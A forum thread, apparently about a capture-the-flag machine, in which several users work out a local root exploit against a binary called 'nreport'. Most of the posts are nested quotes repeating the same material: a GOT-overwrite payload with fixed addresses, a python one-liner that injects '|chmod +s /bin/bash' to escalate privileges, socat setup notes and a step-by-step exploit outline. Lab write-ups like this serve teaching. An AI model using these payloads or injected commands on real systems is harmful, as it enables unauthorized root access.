Posts: 78 Threads: 0 Joined: N/A (July 14, 2022, 09:17 PM)meowmeowattack Wrote: (July 14, 2022, 12:10 PM)yournamehere Wrote: (July 14, 2022, 12:12 AM)meowmeowattack Wrote: (June 17, 2022, 07:15 PM)yournamehere Wrote: I thought I was close to root , but when you break through a wall you hit another one! oh men !
i see what you meant there, i think i'm also hitting the "another wall". i was crafting the exploit by running nreport from cmd, rather than using socat.....
shouldn't be a problem as we interact with the app prompt. Did you find the pointer I mentioned ?
Had a chat with Cryptocat , he told me we should be able to overwrite the GOT as we have partial RELRO but for some reason it doesn't work here
hi there,
the way i'm currently doing is like this: overwrite printf and overflow into fopen with a ref to system, so that fopen can execute the info stored in userinfo1 + 0x8c, which can be something like | touch poc, this will be executed.
overflow_padding = b'\x00'*(4*9)
printf_got = b'\x7c\x15\x40\x00' # overwrite with report
# set {long}0x404088=0x0040157c
fopen_got = b'\x80\x11\x40\x00' # overwrite with system
# set {long}0x404070=0x00401180
payload = printf_got + overflow_padding + fopen_got
however, this only works if i run nreport without socat, i can also reproduce this using pwntools
python -c "print('UiBXpthJzfNyBk
' + '|chmod +s /bin/bash
' + '1
1
1
'); print('3
' + '-1831
'); print('\x7c\x15\x40\x00' + '\x00'*(4*9-1) + '\x80\x11\x40\x00');" | /usr/local/bin/Nreport/nreport
but it doesn't work when running via socat, even though when debugging the process everything seems to be same as running without the socat
server = process(['socat', 'tcp4-listen:9851,reuseaddr,fork,bind=127.0.0.1', 'exec:/usr/local/bin/Nreport/nreport,pty,stderr'])
sleep(1) # Wait for socat to start
p = remote('127.0.0.1', 9851)
sleep(1) # Wait for process to fork
any more nudge? finally got root. the aforementioned issue was caused by pty, this post helped: https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/socat Posts: 6 Threads: 0 Joined: N/A (July 15, 2022, 03:18 AM)meowmeowattack Wrote: (July 14, 2022, 09:17 PM)meowmeowattack Wrote: (July 14, 2022, 12:10 PM)yournamehere Wrote: (July 14, 2022, 12:12 AM)meowmeowattack Wrote: (June 17, 2022, 07:15 PM)yournamehere Wrote: I thought I was close to root , but when you break through a wall you hit another one! oh men !
i see what you meant there, i think i'm also hitting the "another wall". i was crafting the exploit by running nreport from cmd, rather than using socat.....
shouldn't be a problem as we interact with the app prompt. Did you find the pointer I mentioned ?
Had a chat with Cryptocat , he told me we should be able to overwrite the GOT as we have partial RELRO but for some reason it doesn't work here
hi there,
the way i'm currently doing is like this: overwrite printf and overflow into fopen with a ref to system, so that fopen can execute the info stored in userinfo1 + 0x8c, which can be something like | touch poc, this will be executed.
overflow_padding = b'\x00'*(4*9)
printf_got = b'\x7c\x15\x40\x00' # overwrite with report
# set {long}0x404088=0x0040157c
fopen_got = b'\x80\x11\x40\x00' # overwrite with system
# set {long}0x404070=0x00401180
payload = printf_got + overflow_padding + fopen_got
however, this only works if i run nreport without socat, i can also reproduce this using pwntools
python -c "print('UiBXpthJzfNyBk
' + '|chmod +s /bin/bash
' + '1
1
1
'); print('3
' + '-1831
'); print('\x7c\x15\x40\x00' + '\x00'*(4*9-1) + '\x80\x11\x40\x00');" | /usr/local/bin/Nreport/nreport
but it doesn't work when running via socat, even though when debugging the process everything seems to be same as running without the socat
server = process(['socat', 'tcp4-listen:9851,reuseaddr,fork,bind=127.0.0.1', 'exec:/usr/local/bin/Nreport/nreport,pty,stderr'])
sleep(1) # Wait for socat to start
p = remote('127.0.0.1', 9851)
sleep(1) # Wait for process to fork
any more nudge?
finally got root.
the aforementioned issue was caused by pty, this post helped: https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/socat hi bro. can you please share root hash? thanks Posts: 78 Threads: 0 Joined: N/A (July 15, 2022, 07:17 AM)never_konw_who Wrote: (July 15, 2022, 03:18 AM)meowmeowattack Wrote: (July 14, 2022, 09:17 PM)meowmeowattack Wrote: (July 14, 2022, 12:10 PM)yournamehere Wrote: (July 14, 2022, 12:12 AM)meowmeowattack Wrote: i see what you meant there, i think i'm also hitting the "another wall". i was crafting the exploit by running nreport from cmd, rather than using socat.....
shouldn't be a problem as we interact with the app prompt. Did you find the pointer I mentioned ?
Had a chat with Cryptocat , he told me we should be able to overwrite the GOT as we have partial RELRO but for some reason it doesn't work here
hi there,
the way i'm currently doing is like this: overwrite printf and overflow into fopen with a ref to system, so that fopen can execute the info stored in userinfo1 + 0x8c, which can be something like | touch poc, this will be executed.
overflow_padding = b'\x00'*(4*9)
printf_got = b'\x7c\x15\x40\x00' # overwrite with report
# set {long}0x404088=0x0040157c
fopen_got = b'\x80\x11\x40\x00' # overwrite with system
# set {long}0x404070=0x00401180
payload = printf_got + overflow_padding + fopen_got
however, this only works if i run nreport without socat, i can also reproduce this using pwntools
python -c "print('UiBXpthJzfNyBk
' + '|chmod +s /bin/bash
' + '1
1
1
'); print('3
' + '-1831
'); print('\x7c\x15\x40\x00' + '\x00'*(4*9-1) + '\x80\x11\x40\x00');" | /usr/local/bin/Nreport/nreport
but it doesn't work when running via socat, even though when debugging the process everything seems to be same as running without the socat
server = process(['socat', 'tcp4-listen:9851,reuseaddr,fork,bind=127.0.0.1', 'exec:/usr/local/bin/Nreport/nreport,pty,stderr'])
sleep(1) # Wait for socat to start
p = remote('127.0.0.1', 9851)
sleep(1) # Wait for process to fork
any more nudge?
finally got root.
the aforementioned issue was caused by pty, this post helped: https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/socat
hi bro.
can you please share root hash?
thanks syn's write up doesn't have the exploit dev part yet, no use to get the root hash. following is the concept on how to develop the exploit. * locate a pointer that points to printf GOT, edit -1831 leads to this pointer * locate the report function address, overwrite X with this address * locate the system function address, overwrite Y with this address * between X and Y, fill with null paddings * for the socat part, some characters are control characters, they need to be escaped using \x16, e.g \x16\xCC 0x404040 <[email protected]>: 0xd0 0xd0 0xa7 0xf7 0xff 0x7f 0x00 0x00
0x404048 <[email protected]>: 0xXX 0xXX 0xXX 0xXX 0x00 0x00 0x00 0x00
0x404050 <[email protected]>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x404058 <[email protected]>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x404060 <[email protected]>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x404068 <[email protected]>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x404070 <[email protected]>: 0xYY 0xYY 0xYY 0xYY 0x00 0x00 0x00 0x00
Posts: 35 Threads: 0 Joined: N/A (July 15, 2022, 08:19 AM)meowmeowattack Wrote: (July 15, 2022, 07:17 AM)never_konw_who Wrote: (July 15, 2022, 03:18 AM)meowmeowattack Wrote: (July 14, 2022, 09:17 PM)meowmeowattack Wrote: (July 14, 2022, 12:10 PM)yournamehere Wrote: shouldn't be a problem as we interact with the app prompt. Did you find the pointer I mentioned ?
Had a chat with Cryptocat , he told me we should be able to overwrite the GOT as we have partial RELRO but for some reason it doesn't work here
hi there,
the way i'm currently doing is like this: overwrite printf and overflow into fopen with a ref to system, so that fopen can execute the info stored in userinfo1 + 0x8c, which can be something like | touch poc, this will be executed.
overflow_padding = b'\x00'*(4*9)
printf_got = b'\x7c\x15\x40\x00' # overwrite with report
# set {long}0x404088=0x0040157c
fopen_got = b'\x80\x11\x40\x00' # overwrite with system
# set {long}0x404070=0x00401180
payload = printf_got + overflow_padding + fopen_got
however, this only works if i run nreport without socat, i can also reproduce this using pwntools
python -c "print('UiBXpthJzfNyBk
' + '|chmod +s /bin/bash
' + '1
1
1
'); print('3
' + '-1831
'); print('\x7c\x15\x40\x00' + '\x00'*(4*9-1) + '\x80\x11\x40\x00');" | /usr/local/bin/Nreport/nreport
but it doesn't work when running via socat, even though when debugging the process everything seems to be same as running without the socat
server = process(['socat', 'tcp4-listen:9851,reuseaddr,fork,bind=127.0.0.1', 'exec:/usr/local/bin/Nreport/nreport,pty,stderr'])
sleep(1) # Wait for socat to start
p = remote('127.0.0.1', 9851)
sleep(1) # Wait for process to fork
any more nudge?
finally got root.
the aforementioned issue was caused by pty, this post helped: https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/socat
hi bro.
can you please share root hash?
thanks
syn's write up doesn't have the exploit dev part yet, no use to get the root hash.
following is the concept on how to develop the exploit.
* locate a pointer that points to printf GOT, edit -1831 leads to this pointer
* locate the report function address, overwrite X with this address
* locate the system function address, overwrite Y with this address
* between X and Y, fill with null paddings
* for the socat part, some characters are control characters, they need to be escaped using \x16, e.g \x16\xCC
0x404040 <[email protected]>: 0xd0 0xd0 0xa7 0xf7 0xff 0x7f 0x00 0x00
0x404048 <[email protected]>: 0xXX 0xXX 0xXX 0xXX 0x00 0x00 0x00 0x00
0x404050 <[email protected]>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x404058 <[email protected]>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x404060 <[email protected]>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x404068 <[email protected]>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x404070 <[email protected]>: 0xYY 0xYY 0xYY 0xYY 0x00 0x00 0x00 0x00
Congrats ! I tried this but for some reason I couldn't overwrite the GOT even without socat :dodgy: I overwrote the echo command using a pointer to 0x3ff810. I still wonder how to send non ascii chars using python3 an bypass the UTF 16. maybe your trick to use \x16 is a good workaround Posts: 35 Threads: 0 Joined: N/A (July 15, 2022, 08:19 AM)meowmeowattack Wrote: (July 15, 2022, 07:17 AM)never_konw_who Wrote: (July 15, 2022, 03:18 AM)meowmeowattack Wrote: (July 14, 2022, 09:17 PM)meowmeowattack Wrote: (July 14, 2022, 12:10 PM)yournamehere Wrote: shouldn't be a problem as we interact with the app prompt. Did you find the pointer I mentioned ?
Had a chat with Cryptocat , he told me we should be able to overwrite the GOT as we have partial RELRO but for some reason it doesn't work here
hi there,
the way i'm currently doing is like this: overwrite printf and overflow into fopen with a ref to system, so that fopen can execute the info stored in userinfo1 + 0x8c, which can be something like | touch poc, this will be executed.
overflow_padding = b'\x00'*(4*9)
printf_got = b'\x7c\x15\x40\x00' # overwrite with report
# set {long}0x404088=0x0040157c
fopen_got = b'\x80\x11\x40\x00' # overwrite with system
# set {long}0x404070=0x00401180
payload = printf_got + overflow_padding + fopen_got
however, this only works if i run nreport without socat, i can also reproduce this using pwntools
python -c "print('UiBXpthJzfNyBk
' + '|chmod +s /bin/bash
' + '1
1
1
'); print('3
' + '-1831
'); print('\x7c\x15\x40\x00' + '\x00'*(4*9-1) + '\x80\x11\x40\x00');" | /usr/local/bin/Nreport/nreport
but it doesn't work when running via socat, even though when debugging the process everything seems to be same as running without the socat
server = process(['socat', 'tcp4-listen:9851,reuseaddr,fork,bind=127.0.0.1', 'exec:/usr/local/bin/Nreport/nreport,pty,stderr'])
sleep(1) # Wait for socat to start
p = remote('127.0.0.1', 9851)
sleep(1) # Wait for process to fork
any more nudge?
finally got root.
the aforementioned issue was caused by pty, this post helped: https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/socat
hi bro.
can you please share root hash?
thanks
syn's write up doesn't have the exploit dev part yet, no use to get the root hash.
following is the concept on how to develop the exploit.
* locate a pointer that points to printf GOT, edit -1831 leads to this pointer
* locate the report function address, overwrite X with this address
* locate the system function address, overwrite Y with this address
* between X and Y, fill with null paddings
* for the socat part, some characters are control characters, they need to be escaped using \x16, e.g \x16\xCC
0x404040 <[email protected]>: 0xd0 0xd0 0xa7 0xf7 0xff 0x7f 0x00 0x00
0x404048 <[email protected]>: 0xXX 0xXX 0xXX 0xXX 0x00 0x00 0x00 0x00
0x404050 <[email protected]>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x404058 <[email protected]>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x404060 <[email protected]>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x404068 <[email protected]>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x404070 <[email protected]>: 0xYY 0xYY 0xYY 0xYY 0x00 0x00 0x00 0x00
BTW if you wish to discuss about our different findings and solutions feel free to DM. I'll be glad to share :) Posts: 35 Threads: 0 Joined: N/A July 16, 2022 at 11:59 AM (July 15, 2022, 08:19 AM)meowmeowattack Wrote: (July 15, 2022, 07:17 AM)never_konw_who Wrote: (July 15, 2022, 03:18 AM)meowmeowattack Wrote: (July 14, 2022, 09:17 PM)meowmeowattack Wrote: (July 14, 2022, 12:10 PM)yournamehere Wrote: shouldn't be a problem as we interact with the app prompt. Did you find the pointer I mentioned ?
Had a chat with Cryptocat , he told me we should be able to overwrite the GOT as we have partial RELRO but for some reason it doesn't work here
hi there,
the way i'm currently doing is like this: overwrite printf and overflow into fopen with a ref to system, so that fopen can execute the info stored in userinfo1 + 0x8c, which can be something like | touch poc, this will be executed.
overflow_padding = b'\x00'*(4*9)
printf_got = b'\x7c\x15\x40\x00' # overwrite with report
# set {long}0x404088=0x0040157c
fopen_got = b'\x80\x11\x40\x00' # overwrite with system
# set {long}0x404070=0x00401180
payload = printf_got + overflow_padding + fopen_got
however, this only works if i run nreport without socat, i can also reproduce this using pwntools
python -c "print('UiBXpthJzfNyBk
' + '|chmod +s /bin/bash
' + '1
1
1
'); print('3
' + '-1831
'); print('\x7c\x15\x40\x00' + '\x00'*(4*9-1) + '\x80\x11\x40\x00');" | /usr/local/bin/Nreport/nreport
but it doesn't work when running via socat, even though when debugging the process everything seems to be same as running without the socat
server = process(['socat', 'tcp4-listen:9851,reuseaddr,fork,bind=127.0.0.1', 'exec:/usr/local/bin/Nreport/nreport,pty,stderr'])
sleep(1) # Wait for socat to start
p = remote('127.0.0.1', 9851)
sleep(1) # Wait for process to fork
any more nudge?
finally got root.
the aforementioned issue was caused by pty, this post helped: https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/socat
hi bro.
can you please share root hash?
thanks
syn's write up doesn't have the exploit dev part yet, no use to get the root hash.
following is the concept on how to develop the exploit.
* locate a pointer that points to printf GOT, edit -1831 leads to this pointer
* locate the report function address, overwrite X with this address
* locate the system function address, overwrite Y with this address
* between X and Y, fill with null paddings
* for the socat part, some characters are control characters, they need to be escaped using \x16, e.g \x16\xCC
0x404040 <[email protected]>: 0xd0 0xd0 0xa7 0xf7 0xff 0x7f 0x00 0x00
0x404048 <[email protected]>: 0xXX 0xXX 0xXX 0xXX 0x00 0x00 0x00 0x00
0x404050 <[email protected]>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x404058 <[email protected]>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x404060 <[email protected]>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x404068 <[email protected]>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x404070 <[email protected]>: 0xYY 0xYY 0xYY 0xYY 0x00 0x00 0x00 0x00
Your private messages are disabled , I can't answer :( Posts: 56 Threads: 0 Joined: N/A October 22, 2022 at 4:37 AM will check it out |
